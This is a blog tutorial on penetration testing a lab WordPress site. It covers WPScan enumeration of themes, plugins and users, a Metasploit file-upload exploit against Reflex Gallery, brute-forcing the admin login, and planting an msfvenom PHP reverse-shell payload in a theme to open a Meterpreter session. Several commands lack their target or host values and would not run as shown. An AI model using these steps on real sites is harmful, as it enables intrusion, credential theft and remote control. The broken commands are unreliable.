Wordpress Penetration testing using WPScan & Metasploit

In our previous article we had discussed “WordPress Penetration Testing Lab Setup in Ubuntu” and today you will learn wordpress penetration testing using WPSCAN and METASPLOIT.

Attacker: Kali Linux
Target: Wordpress 

WPScan is a black box vulnerability scanner for WordPress written in PHP mainly focus on different types of vulnerability in WordPress, WordPress themes, and plugins. Well, WPScan tool is already installed by default in Kali Linux, SamuraiWTF, Pentoo, BlackArch, and BackBox Linux. WPScanuses the database of all the available plugins and themes (approximately over 18000 plugins and 2600 themes) during testing against the target to find outdated versions and vulnerabilities.

Things WPScan can do for you are:
Detect a version of currently installed WordPress.
-Can detect sensitive files like readme, robots.txt, database replacing files, etc.
-Detect enabled features on currently installed WordPress.
-Enumerate theme version and name.
-Detect installed plugins and can tell you if it is outdated or not.
-Enumerate user names also.

Let’s start.

Go to your Kali Linux terminal and type following to download wpscan from git hub.

cd Desktop

git clone https://github.com/wpscanteam/wpscan.git

./wpscan.rb –h

Using default Option we will are going to penetrate our wordpress website:
e             or –enumerate option use for Enumeration.
u        usernames from id 1 to 10
 u[10-20] usernames from id 10 to 20 (you must write [] chars)
 p        plugins
 vp       only vulnerable plugins
ap       all plugins (can take a long time)
 tt       timthumbs
  t        themes
  vt       only vulnerable themes
  at       all themes (can take a long time)

Wpscan is a great tool to scan wordpress websites. Now we will try to do some basic scan, we will use enumerate tools to find information about themes, plugins, usernames etc.

Now type following command to scan wordpress and its server:
./wpscan.rb –u
Instead of type the name of a website you want to scan. 

 Here it found server: Apache/2.4.7, PHP /5.5.9 wordpress version 4.8.1, using this information an attacker can check for its exploit in Google. Moreover it also found that the upload directory has directory listing enable which means anyone can browse the directory /wp-content/uploads to view the uploaded files and contents.

A theme controls the general look and feel of website including things like page layout, widget locations, and default font and color choices. WordPress.com has a wide range of themes for its user and each theme has an about page that includes features and instructions.

To scan installed theme of wordpress website type following command:
./wpscan.rb –u–enumerate t

After some time we successfully found Theme twentysevebteen –v1.3, last update, location of theme installed and etc as shown below.

Enumerating wordpress vulnerable Theme
To scan installed vulnerable theme of wordpress website type following command:
./wpscan.rb –u–enumerate vt

From scanning result we didn’t find any vulnerable theme which means there is no vulnerable theme which can be exploited.

Plugins are small piece of code of a program which can be added to a WordPress website to extend its functionality.
To find installed plugins on our target’s WordPress website, type in terminal:
./wpscan.rb –u–enumerate p

Now type following command to scan vulnerable plug-in of any wordpress website:
./wpscan.rb –u–enumerate vp

This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.

Open the terminal load metasploit framework and execute following command:
use exploit/unix/webapp/wp_reflexgallery_file_upload
msf exploit(wp_reflexgallery_file_upload) > set rhost
msf exploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/
msf exploit(wp_reflexgallery_file_upload) > exploit

Awesome!! From given image you can observe the meterpreter session of victim’s web server.
Meterpreter> sysinfo

Enumerating wordpress Usernames
In order to enumerate user names of wordpress website execute following command:

After sometime it will dump the table of usernames. In this scan I had found three users with their Id as given below:
ID 1: admin
ID2: ignite
ID: demo

Whatever we have scanned above can be easily enumerate at once by executing given below command:
./wpscan.rb –u -e at –e ap –e u

Here we had use option –e at –e ap –e u for following reasons:

–e at : enumerate all themes of targeted website
–e ap: enumerate all plugins of targeted website
–e u: enumerate all usernames of targetd website

Brute force attack using Wpscan
With help of username which we had enumerated above we can create a wordlist of password for user admin and can try brute force login attack using given below command.
./wpscan.rb –u --wordlist /root/Desktop/dict.txt –username admin

You can use above credential for login into admin panel where we can upload any theme, taking advantage of admin right we will try to upload malicious script to achieve reverse connection from victim’s system.
Once you are inside admin panel click on Appearance from dashboard and then select option editor.

msfvenom –p php/meterpreter/reverse_tcp lhost= lport=4444 –f raw
 From screenshot you can read the generated PHP script, at this instant we need to copy the text from *further we will past it inside wordpress template as a new theme.

use exploit/multi/handler
 msf exploit(handler) >set payload php/meterpreter/reverse_tcp
msf exploit(handler) >set lhost
msf exploit(handler) >4444
msf exploit(handler) >exploit

Meterpreter> sysinfo

In this way using WPSCAN and METASPLOIT admin can check the strength and weakness of wordpress website.


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